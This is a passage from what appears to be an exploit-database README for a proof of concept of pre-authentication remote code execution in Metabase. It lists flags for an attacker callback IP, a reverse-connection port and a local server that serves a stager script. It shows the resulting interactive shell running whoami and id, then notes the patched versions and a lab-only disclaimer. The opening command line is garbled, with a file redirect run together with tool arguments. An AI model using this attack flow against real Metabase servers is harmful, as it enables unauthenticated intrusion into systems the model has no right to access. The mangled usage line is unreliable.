## https://sploitus.com/exploit?id=580287DA-3A52-5460-990D-C6364A070306
cd ~/metabase-poc
cat > README.md -p 4444 -P 8000 -u http://localhost:3000
```
- `-l` โ attacker callback IP (Docker bridge gateway when target is a
local container, e.g. `172.17.0.1`)
- `-p` โ port the reverse data channel connects back on
- `-P` โ local HTTP server port serving the stager script
- `-u` โ target Metabase base URL
Drops into an interactive `metabase_shell >` prompt once the pre-auth
callback confirms exploitability.
## Result
metabase_shell > whoami
metabase
metabase_shell > id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
Command execution confirmed as the `metabase` service account โ pre-auth,
no credentials required. Severity stems from network-reachable RCE with
zero authentication, not from the privilege level of the resulting shell.
## Fix
Patched in Metabase 0.46.6.1 / 1.46.6.1 and later โ the `/api/setup/validate`
endpoint now requires setup to be genuinely incomplete, and setup tokens
are invalidated once initial setup finishes.
## Disclaimer
For isolated lab use only. Do not run against Metabase instances you do
not own or have explicit authorization to test.